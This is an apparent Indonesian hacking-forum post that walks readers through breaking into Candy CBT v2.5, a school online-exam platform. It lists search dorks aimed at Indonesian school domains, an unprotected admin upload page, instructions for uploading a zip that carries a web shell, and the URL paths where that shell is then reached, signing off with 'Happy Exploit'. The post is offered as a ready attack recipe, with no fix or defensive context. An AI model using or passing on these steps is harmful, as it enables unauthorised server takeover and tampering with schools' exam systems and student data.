Hallo Gannn....
Kali Ini Gua Nemu Bug Candy Cbt Lagi..
Karna Gua Baru Nemu Jadi Gua Share Aja Langsung Wkwkw...

Bahan² :

  • Dork
  1. Responsive image by candy cbt inurl:login.php
  2. Responsive image by candy cbt site:sch.id

  • Exploit
admin/filesoal.php

Tahap² :
  • Pertama Kalian Dorking Menggunaka Dork Yang Gua Buat Sendiri Di Atas
  • Jika Sudah Dorking Cari Candy Cbt Yang V2.5 
Tampilan Dari Candy Cbt V2.5
  • Jika Tampilan Seperti Itu Artinya Candy Cbt Tersebut V2.5
  • Lanjut Masukan Exploitnya


  • Jadi Gini Gan :
http://site.com/admin/filesoal.php

Atau

http://site.com/patch/admin/filesoal.php

  • Nah Jika Sudah Kalian Upload File Kalian Gan Tapi Harus Ext zip Seperti Di candy cbt v2.6 yang saya share kemarin
  • Jika Terupload Akan Seperti Ini Gan
  • Akan Muncul Beberapa Gambar Dan Itu Artinya Success Terupload
  • Untuk Akses Shell Kalian Sama Seperti Di Candy Cbt V2.6 Yaitu Di Folder /files
http://site.com/files/shell.php

Atau

http://site.com/patch/files/shell.php

Sekian Dan Happy Exploit Gan...